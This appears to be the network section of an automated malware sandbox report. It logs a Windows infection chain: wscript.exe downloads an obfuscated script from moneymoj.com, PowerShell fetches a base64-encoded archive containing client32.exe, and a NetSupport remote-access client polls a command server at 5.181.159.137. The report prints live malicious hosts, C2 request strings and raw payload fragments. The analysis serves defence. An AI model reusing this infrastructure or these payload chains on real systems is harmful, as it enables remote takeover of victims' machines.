                                                                                Sep 10, 2024 16:33:51.587723017 CEST4973680192.168.2.6104.26.1.231
                                                                                Sep 10, 2024 16:33:51.597737074 CEST8049736104.26.1.231192.168.2.6
                                                                                Sep 10, 2024 16:33:51.598253965 CEST4973680192.168.2.6104.26.1.231
                                                                                Sep 10, 2024 16:33:51.598952055 CEST4973680192.168.2.6104.26.1.231
                                                                                Sep 10, 2024 16:33:51.608283043 CEST8049736104.26.1.231192.168.2.6
                                                                                Sep 10, 2024 16:33:52.274112940 CEST8049736104.26.1.231192.168.2.6
                                                                                Sep 10, 2024 16:33:52.274184942 CEST4973680192.168.2.6104.26.1.231
                                                                                Sep 10, 2024 16:35:41.361219883 CEST4973680192.168.2.6104.26.1.231
                                                                                Sep 10, 2024 16:35:41.366950989 CEST8049736104.26.1.231192.168.2.6
                                                                                Sep 10, 2024 16:35:41.367010117 CEST4973680192.168.2.6104.26.1.231

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Sep 10, 2024 16:33:38.861236095 CEST6479753192.168.2.61.1.1.1
                                                                                Sep 10, 2024 16:33:38.898514986 CEST53647971.1.1.1192.168.2.6
                                                                                Sep 10, 2024 16:33:47.058327913 CEST5558853192.168.2.61.1.1.1
                                                                                Sep 10, 2024 16:33:47.102375031 CEST53555881.1.1.1192.168.2.6
                                                                                Sep 10, 2024 16:33:51.562561035 CEST6483353192.168.2.61.1.1.1
                                                                                Sep 10, 2024 16:33:51.581818104 CEST53648331.1.1.1192.168.2.6

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Sep 10, 2024 16:33:38.861236095 CEST192.168.2.61.1.1.10xec0dStandard query (0)moneymoj.comA (IP address)IN (0x0001)false
                                                                                Sep 10, 2024 16:33:47.058327913 CEST192.168.2.61.1.1.10x8df4Standard query (0)ipva2024-detransp.comA (IP address)IN (0x0001)false
                                                                                Sep 10, 2024 16:33:51.562561035 CEST192.168.2.61.1.1.10x47fdStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Sep 10, 2024 16:33:38.898514986 CEST1.1.1.1192.168.2.60xec0dNo error (0)moneymoj.com8.39.147.104A (IP address)IN (0x0001)false
                                                                                Sep 10, 2024 16:33:47.102375031 CEST1.1.1.1192.168.2.60x8df4No error (0)ipva2024-detransp.com79.141.161.172A (IP address)IN (0x0001)false
                                                                                Sep 10, 2024 16:33:51.581818104 CEST1.1.1.1192.168.2.60x47fdNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                Sep 10, 2024 16:33:51.581818104 CEST1.1.1.1192.168.2.60x47fdNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                Sep 10, 2024 16:33:51.581818104 CEST1.1.1.1192.168.2.60x47fdNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • moneymoj.com
                                                                                • ipva2024-detransp.com
                                                                                • 5.181.159.137connection: keep-alivecmd=pollinfo=1ack=1
                                                                                • geo.netsupportsoftware.com

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.6497355.181.159.1374432760C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 10, 2024 16:33:51.573811054 CEST218OUTPOST http://5.181.159.137/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.181.159.137Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                Data Raw:
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.649736104.26.1.231802760C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 10, 2024 16:33:51.598952055 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                                Host: geo.netsupportsoftware.com
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                Sep 10, 2024 16:33:52.274112940 CEST931INHTTP/1.1 200 OK
                                                                                Date: Tue, 10 Sep 2024 14:33:52 GMT
                                                                                Content-Type: text/html; Charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                CF-Ray: 8c1022b40ad342e8-EWR
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Access-Control-Allow-Origin: *
                                                                                Cache-Control: private
                                                                                Set-Cookie: ASPSESSIONIDCADAQTAA=HNJHEEODIJJBFPLPGNPCHNOB; path=/
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                Vary: Accept-Encoding
                                                                                cf-apo-via: origin,host
                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrfyrfUhRPBCArwWNrJaWoQ1YhGyO1DdmF8L9tYwtp9fOaFYnhc4XF8FtQ7b0CyIvK4MQxf21tysZ6JdYlXLNJRrtUzDGPlTIchpbGMWQ4o%2FLxIrqi9BWOu%2BmmJaZmnMye2nDB1nVEYyQ7Pf"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 1040.7357,-74.17240


                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.6497188.39.147.1044432324C:\Windows\System32\wscript.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-09-10 14:33:39 UTC210OUTPOST /cdn-vs/update.php?88 HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                Accept-Language: en-CH
                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                Content-Length: 0
                                                                                Host: moneymoj.com
                                                                                2024-09-10 14:33:39 UTC357INHTTP/1.1 200 OK
                                                                                Date: Tue, 10 Sep 2024 14:33:39 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Content-Description: File Transfer
                                                                                Content-Disposition: attachment; filename=updates.js
                                                                                Content-Transfer-Encoding: binary
                                                                                Expires: 0
                                                                                Cache-Control: must-revalidate
                                                                                Pragma: public
                                                                                Content-Length: 3687106
                                                                                Connection: close
                                                                                Content-Type: application/octet-stream
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6f 28 69 2c 20 66 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 6e 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 20 26 26 20 72 65 71 75 69 72 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 66 20 26 26 20 63 29 20 72 65 74 75 72 6e 20 63 28 69 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                Data Ascii: (function() { function r(e, n, t) { function o(i, f) { if (!n[i]) { if (!e[i]) { var c = "function" == typeof require && require; if (!f && c) return c(i, !0);
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 4f 47 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 6f 64 75 6c 65 49 64 3a 20 6b 2e 6d 6f 64 75 6c 65 4c 6f 61 64 65 72 53 74 61 74 65 5f 2e 6d 6f 64 75 6c 65 4e 61 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 27 49 6e 76 61 6c 69 64 20 6d 6f 64 75 6c 65 20 6e 61 6d 65 20 22 27 20 2b 20 67 20 2b 20 27 22 27 29 3b 0a 20 20 20 20 7d 20 66 69 6e 61 6c 6c 79 20 7b 0a 20 20 20 20 20 20 20 20 6b 2e 6d 6f 64 75 6c 65 4c 6f 61 64 65 72 53 74 61 74 65 5f 20 3d 20 62 0a 20 20 20 20 7d 0a 7d 3b 0a 6b 2e 6c 6f 61 64 4d 6f 64 75 6c 65 46 72 6f 6d 53 6f 75 72 63 65 5f 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 65 76 61 6c 28 6b 2e 43 4c 4f 53 55
                                                                                Data Ascii: OG, moduleId: k.moduleLoaderState_.moduleName }; else throw Error('Invalid module name "' + g + '"'); } finally { k.moduleLoaderState_ = b }};k.loadModuleFromSource_ = function(a, b) { eval(k.CLOSU
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 66 29 20 7b 0a 20 20 20 20 76 61 72 20 67 20 3d 20 63 3b 0a 20 20 20 20 6e 28 61 2c 20 66 75 6e 63 74 69 6f 6e 28 68 2c 20 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 67 20 3d 20 62 2e 63 61 6c 6c 28 66 2c 20 67 2c 20 68 2c 20 6c 2c 20 61 29 0a 20 20 20 20 7d 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 67 0a 7d 3b 0a 6b 2e 61 72 72 61 79 2e 72 65 64 75 63 65 20 3d 20 6f 61 3b 0a 6b 2e 61 72 72 61 79 2e 72 65 64 75 63 65 52 69 67 68 74 20 3d 20 6b 2e 4e 41 54 49 56 45 5f 41 52 52 41 59 5f 50 52 4f 54 4f 54 59 50 45 53 20 26 26 20 28 6d 20 7c 7c 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 64 75 63 65 52 69 67 68 74 29 20 3f 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 66 29 20 7b 0a 20
                                                                                Data Ascii: function(a, b, c, f) { var g = c; n(a, function(h, l) { g = b.call(f, g, h, l, a) }); return g};k.array.reduce = oa;k.array.reduceRight = k.NATIVE_ARRAY_PROTOTYPES && (m || Array.prototype.reduceRight) ? function(a, b, c, f) {
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 63 74 2e 66 69 6e 64 56 61 6c 75 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 28 62 20 3d 20 6b 2e 6f 62 6a 65 63 74 2e 66 69 6e 64 4b 65 79 28 61 2c 20 62 2c 20 63 29 29 20 26 26 20 61 5b 62 5d 0a 7d 3b 0a 6b 2e 6f 62 6a 65 63 74 2e 69 73 45 6d 70 74 79 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 62 20 69 6e 20 61 29 20 72 65 74 75 72 6e 20 21 31 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 21 30 0a 7d 3b 0a 6b 2e 6f 62 6a 65 63 74 2e 63 6c 65 61 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 62 20 69 6e 20 61 29 20 64 65 6c 65 74 65 20 61 5b 62 5d 0a 7d 3b 0a 6b 2e 6f 62 6a 65 63 74 2e 72 65 6d 6f 76 65 20 3d
                                                                                Data Ascii: ct.findValue = function(a, b, c) { return (b = k.object.findKey(a, b, c)) && a[b]};k.object.isEmpty = function(a) { for (var b in a) return !1; return !0};k.object.clear = function(a) { for (var b in a) delete a[b]};k.object.remove =
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 61 67 4e 61 6d 65 2e 44 41 54 41 4c 49 53 54 20 3d 20 22 44 41 54 41 4c 49 53 54 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 44 20 3d 20 22 44 44 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 45 4c 20 3d 20 22 44 45 4c 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 45 54 41 49 4c 53 20 3d 20 22 44 45 54 41 49 4c 53 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 46 4e 20 3d 20 22 44 46 4e 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 49 41 4c 4f 47 20 3d 20 22 44 49 41 4c 4f 47 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 49 52 20 3d 20 22 44 49 52 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 49 56 20 3d 20 22 44 49 56 22 3b 0a 6b 2e 64 6f 6d 2e 54 61 67 4e 61 6d 65 2e 44 4c 20 3d 20 22 44 4c 22 3b
                                                                                Data Ascii: agName.DATALIST = "DATALIST";k.dom.TagName.DD = "DD";k.dom.TagName.DEL = "DEL";k.dom.TagName.DETAILS = "DETAILS";k.dom.TagName.DFN = "DFN";k.dom.TagName.DIALOG = "DIALOG";k.dom.TagName.DIR = "DIR";k.dom.TagName.DIV = "DIV";k.dom.TagName.DL = "DL";
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 74 6f 53 74 72 69 6e 67 28 29 0a 7d 3b 0a 64 2e 69 6d 70 6c 65 6d 65 6e 74 73 47 6f 6f 67 49 31 38 6e 42 69 64 69 44 69 72 65 63 74 69 6f 6e 61 6c 53 74 72 69 6e 67 20 3d 20 21 30 3b 0a 64 2e 67 65 74 44 69 72 65 63 74 69 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 6b 2e 69 31 38 6e 2e 62 69 64 69 2e 44 69 72 2e 4c 54 52 0a 7d 3b 0a 64 2e 74 6f 53 74 72 69 6e 67 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 69 76 61 74 65 44 6f 4e 6f 74 41 63 63 65 73 73 4f 72 45 6c 73 65 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 57 72 61 70 70 65 64 56 61 6c 75 65 5f 20 2b 20 22 22 0a 7d 3b 0a 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55
                                                                                Data Ascii: toString()};d.implementsGoogI18nBidiDirectionalString = !0;d.getDirection = function() { return k.i18n.bidi.Dir.LTR};d.toString = function() { return this.privateDoNotAccessOrElseTrustedResourceUrlWrappedValue_ + ""};k.html.TrustedResourceU
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 54 59 0a 7d 3b 0a 76 61 72 20 54 61 20 3d 20 7b 7d 2c 0a 20 20 20 20 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 70 72 69 76 61 74 65 44 6f 4e 6f 74 41 63 63 65 73 73 4f 72 45 6c 73 65 53 61 66 65 53 74 79 6c 65 53 68 65 65 74 57 72 61 70 70 65 64 56 61 6c 75 65 5f 20 3d 20 62 20 3d 3d 3d 20 54 61 20 3f 20 61 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6d 70 6c 65 6d 65 6e 74 73 47 6f 6f 67 53 74 72 69 6e 67 54 79 70 65 64 53 74 72 69 6e 67 20 3d 20 21 30 0a 20 20 20 20 7d 3b 0a 74 2e 63 6f 6e 63 61 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 76 61 72 20 62 20 3d 20 22 22 2c 0a 20 20 20 20 20 20 20 20 63 20 3d 20 66 75 6e 63 74 69 6f 6e 28 66 29 20 7b 0a 20
                                                                                Data Ascii: TY};var Ta = {}, t = function(a, b) { this.privateDoNotAccessOrElseSafeStyleSheetWrappedValue_ = b === Ta ? a : ""; this.implementsGoogStringTypedString = !0 };t.concat = function(a) { var b = "", c = function(f) {
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 2e 73 61 66 65 2e 73 65 74 49 6e 6e 65 72 48 74 6d 6c 46 72 6f 6d 43 6f 6e 73 74 61 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 6b 2e 64 6f 6d 2e 73 61 66 65 2e 73 65 74 49 6e 6e 65 72 48 74 6d 6c 28 61 2c 20 6b 2e 68 74 6d 6c 2e 75 6e 63 68 65 63 6b 65 64 63 6f 6e 76 65 72 73 69 6f 6e 73 2e 73 61 66 65 48 74 6d 6c 46 72 6f 6d 53 74 72 69 6e 67 4b 6e 6f 77 6e 54 6f 53 61 74 69 73 66 79 54 79 70 65 43 6f 6e 74 72 61 63 74 28 6b 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 2e 66 72 6f 6d 28 22 43 6f 6e 73 74 61 6e 74 20 48 54 4d 4c 20 74 6f 20 62 65 20 69 6d 6d 65 64 69 61 74 65 6c 6c 79 20 75 73 65 64 2e 22 29 2c 20 6b 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 2e 75 6e 77 72 61 70 28 62 29 29 29 0a 7d 3b 0a 6b 2e 64 6f 6d 2e 73 61
                                                                                Data Ascii: .safe.setInnerHtmlFromConstant = function(a, b) { k.dom.safe.setInnerHtml(a, k.html.uncheckedconversions.safeHtmlFromStringKnownToSatisfyTypeContract(k.string.Const.from("Constant HTML to be immediatelly used."), k.string.Const.unwrap(b)))};k.dom.sa
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 61 2e 6a 6f 69 6e 28 62 29 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 66 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 6c 61 73 74 43 6f 6d 70 6f 6e 65 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 69 66 20 28 62 29 20 22 73 74 72 69 6e 67 22 20 3d 3d 20 74 79 70 65 6f 66 20 62 20 26 26 20 28 62 20 3d 20 5b 62 5d 29 3b 0a 20 20 20 20 65 6c 73 65 20 72 65 74 75 72 6e 20 61 3b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 63 20 3d 20 2d 31 2c 20 66 20 3d 20 30 3b 20 66 20 3c 20 62 2e 6c 65 6e 67 74 68 3b 20 66 2b 2b 29 0a 20 20 20 20 20 20 20 20 69 66 20 28 22 22 20 21 3d 20 62 5b 66 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 67 20 3d 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 5b 66 5d 29 3b 0a 20 20 20 20 20 20
                                                                                Data Ascii: a.join(b)); return f};k.string.lastComponent = function(a, b) { if (b) "string" == typeof b && (b = [b]); else return a; for (var c = -1, f = 0; f < b.length; f++) if ("" != b[f]) { var g = a.lastIndexOf(b[f]);
                                                                                2024-09-10 14:33:39 UTC16384INData Raw: 6c 6c 65 72 5d 5c 6e 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 2b 2b 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 66 20 3e 3d 20 6b 2e 64 65 62 75 67 2e 4d 41 58 5f 53 54 41 43 4b 5f 44 45 50 54 48 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 2e 70 75 73 68 28 22 5b 2e 2e 2e 6c 6f 6e 67 20 73 74 61 63 6b 2e 2e 2e 5d 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 61 20 26 26 20 66 20 3e 3d 20 61 20 3f 20 62 2e 70 75 73 68 28 22 5b 2e 2e 2e 72 65 61 63 68 65 64 20 6d 61 78 20 64 65 70 74 68 20 6c 69 6d 69 74 2e 2e 2e 5d 22 29 20 3a 20 62 2e 70 75 73 68 28 22 5b 65 6e 64 5d 22 29 3b 0a 20 20 20 20
                                                                                Data Ascii: ller]\n"); break } f++; if (f >= k.debug.MAX_STACK_DEPTH) { b.push("[...long stack...]"); break } } a && f >= a ? b.push("[...reached max depth limit...]") : b.push("[end]");


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.64973379.141.161.1724435880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-09-10 14:33:47 UTC84OUTGET /data.php?6891 HTTP/1.1
                                                                                Host: ipva2024-detransp.com
                                                                                Connection: Keep-Alive
                                                                                2024-09-10 14:33:47 UTC198INHTTP/1.1 200 OK
                                                                                Date: Tue, 10 Sep 2024 14:33:47 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Vary: Accept-Encoding
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                2024-09-10 14:33:47 UTC7994INData Raw: 33 31 38 64 38 30 0d 0a 55 45 73 44 42 42 51 41 41 41 41 49 41 42 78 45 56 31 65 64 6e 69 58 6d 4a 6d 77 41 41 4a 43 56 41 51 41 4d 41 41 41 41 59 32 78 70 5a 57 35 30 4d 7a 49 75 5a 58 68 6c 37 48 77 48 65 46 54 46 31 2f 66 5a 39 45 34 4b 41 53 4c 36 55 76 36 67 69 42 4a 42 6b 56 63 49 68 45 41 49 6e 59 54 30 73 70 75 79 32 56 52 71 67 43 53 41 45 41 56 52 2f 30 43 6f 41 6f 49 67 69 68 44 53 4e 79 47 46 6b 74 43 4c 51 42 41 51 61 55 6f 58 70 4b 54 33 6e 67 33 6e 4f 7a 4f 37 6d 77 49 4a 55 6f 4c 79 66 67 2f 6e 37 75 2f 65 6d 54 74 6e 7a 73 79 39 76 7a 4e 6e 5a 6d 35 34 6d 4f 43 78 43 6c 51 42 51 49 32 41 43 4c 41 48 35 47 49 46 66 79 39 2f 45 67 79 36 5a 42 70 41 75 76 61 5a 62 6e 73 45 34 38 39 30 63 77 6f 4b 6e 74 55 31 5a 4f 62 30 77 4a 6e 69 71 56 30
                                                                                Data Ascii: 318d80UEsDBBQAAAAIABxEV1edniXmJmwAAJCVAQAMAAAAY2xpZW50MzIuZXhl7HwHeFTF1/fZ9E4KASL6Uv6giBJBkVcIhEAInYT0spuy2VRqgCSAEAVR/0CoAoIgihDSNyGFktCLQBAQaUoXpKT3ng3nOzO7mwIJUoLyfg/n7u/emTtnzsy9vzNnZm54mOCxClQBQI2ACLAH5GIFfy9/Egy6ZBpAuvaZbnsE4890cwoKntU1ZOb0wJniqV0
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 35 39 62 6c 4e 75 39 7a 37 6d 46 6c 56 69 35 68 49 68 31 32 46 7a 53 39 4f 36 53 52 54 37 70 53 4c 39 42 76 36 56 38 7a 2f 6a 6e 6e 33 2f 59 58 37 77 72 50 6a 58 2b 48 64 39 48 78 50 63 4e 44 48 65 51 36 39 74 51 50 46 2f 32 77 54 41 6b 37 46 4c 4d 4c 65 77 6a 50 6a 4a 77 51 63 50 48 75 43 44 2b 2f 63 78 76 36 51 53 62 31 77 38 67 30 6e 42 76 54 42 36 49 6d 43 38 55 50 38 70 37 4f 6e 52 66 41 4b 59 50 6d 38 6b 5a 70 4f 39 6e 50 77 69 4f 55 66 33 37 79 74 77 44 37 50 7a 38 76 46 42 66 6a 48 4e 43 38 36 34 62 51 78 67 77 74 50 59 46 65 72 7a 6d 4a 49 61 50 68 6a 76 33 61 66 2b 50 63 68 75 73 4d 6e 53 65 53 58 56 75 48 65 70 6b 4f 76 45 75 2b 73 32 71 35 74 4d 59 7a 2f 4a 6b 2f 67 33 49 2f 37 62 74 51 33 2f 7a 34 73 58 35 74 2f 74 35 66 43 66 46 62 65 55 6a
                                                                                Data Ascii: 59blNu9z7mFlVi5hIh12FzS9O6SRT7pSL9Bv6V8z/jnn3/YX7wrPjX+Hd9HxPcNDHeQ69tQPF/2wTAk7FLMLewjPjJwQcPHuCD+/cxv6QSb1w8g0nBvTB6ImC8UP8p7OnRfAKYPm8kZpO9nPwiOUf37ytwD7Pz8vFBfjHNC864bQxgwtPYFerzmJIaPhjv3af+PchusMnSeSXVuHepkOvEu+s2q5tMYz/Jk/g3I/7btQ3/z4sX5t/t5fCfFbeUj
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 51 62 67 4f 49 43 62 4e 32 36 6c 63 65 42 4a 69 78 66 76 72 77 4e 56 71 78 59 77 64 73 52 31 71 31 62 69 32 66 50 6e 6d 50 35 79 71 2b 52 2b 64 30 58 61 4e 6f 53 68 79 75 5a 4d 54 77 57 4d 73 58 44 70 50 6a 65 50 44 34 30 34 33 53 5a 63 62 76 55 4c 73 59 37 38 65 54 78 68 56 74 69 76 63 76 35 38 6e 6a 67 73 2f 47 7a 44 50 49 34 6d 34 6e 79 4d 38 55 69 76 6c 30 34 6a 2f 50 2f 38 4d 4d 50 51 32 6c 2f 4f 2b 6b 35 37 61 6d 6b 2f 48 65 64 37 58 31 70 58 55 62 2b 2b 43 54 76 31 32 76 59 57 74 6e 38 4e 53 35 6b 70 65 44 71 39 6a 6d 63 6e 35 79 62 48 4e 4c 34 78 31 4b 38 69 66 6e 46 4f 66 48 72 32 65 38 55 4c 34 78 69 42 74 30 70 53 6f 61 66 70 5a 53 2f 62 48 38 6f 38 61 64 31 32 7a 35 32 53 30 66 37 77 57 69 65 69 50 2b 58 33 36 37 44 39 6f 31 66 73 54 46 50 77
                                                                                Data Ascii: QbgOICbN26lceBJixfvrwNVqxYwdsR1q1bi2fPnmP5yq+R+d0XaNoShyuZMTwWMsXDpPjePD4043SZcbvULsY78eTxhVtivcv58njgs/GzDPI4m4nyM8Uivl04j/P/8MMPQ2l/O+k57amk/Hed7X1pXUb++CTv12vYWtn8NS5kpeDq9jmcn5ybHNL4x1K8ifnFOfHr2e8UL4xiBt0pSoafpZS/bH8o8ad12z52S0f7wWieiP+X367D9o1fsTFPw
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 56 61 47 56 47 46 43 65 5a 56 34 38 75 35 49 32 6d 4a 6c 63 48 2f 6c 66 4d 5a 2f 50 2b 54 74 76 78 49 2f 6d 4e 6a 46 2b 44 76 33 6b 36 39 44 48 58 70 62 2b 41 54 55 31 52 69 61 51 4f 52 46 53 44 53 36 39 47 75 42 31 46 51 35 38 46 64 66 6d 46 66 6b 33 59 51 67 38 51 52 78 6e 70 6f 30 70 48 5a 38 53 70 53 44 41 69 74 51 42 69 34 6d 63 4c 7a 31 4f 36 7a 55 4a 52 5a 44 30 42 56 72 72 30 57 34 48 49 70 4a 6c 36 4b 6f 39 33 56 62 4d 65 31 52 66 34 75 55 58 6a 6d 65 7a 51 50 45 4b 4d 68 30 42 69 6d 39 33 6f 76 72 44 66 34 64 70 4d 70 48 35 4a 6d 4e 6f 41 79 79 30 6e 67 32 57 46 31 37 53 67 45 54 74 62 54 31 76 50 44 67 7a 53 75 4e 56 50 64 32 6b 6f 47 58 32 4d 79 65 4f 6e 64 53 2b 72 50 5a 66 56 61 56 61 6f 76 42 48 30 65 62 62 6f 46 39 42 2f 79 4b 72 36 34 56
                                                                                Data Ascii: VaGVGFCeZV48u5I2mJlcH/lfMZ/P+TtvxI/mNjF+Dv3k69DHXpb+ATU1RiaQORFSDS69GuB1FQ58FdfmFfk3YQg8QRxnpo0pHZ8SpSDAitQBi4mcLz1O6zUJRZD0BVrr0W4HIpJl6Ko93VbMe1Rf4uUXjmezQPEKMh0Bim93ovrDf4dpMpH5JmNoAyy0ng2WF17SgETtbT1vPDgzSuNVPd2koGX2MyeOndS+rPZfVaVaovBH0ebboF9B/yKr64V
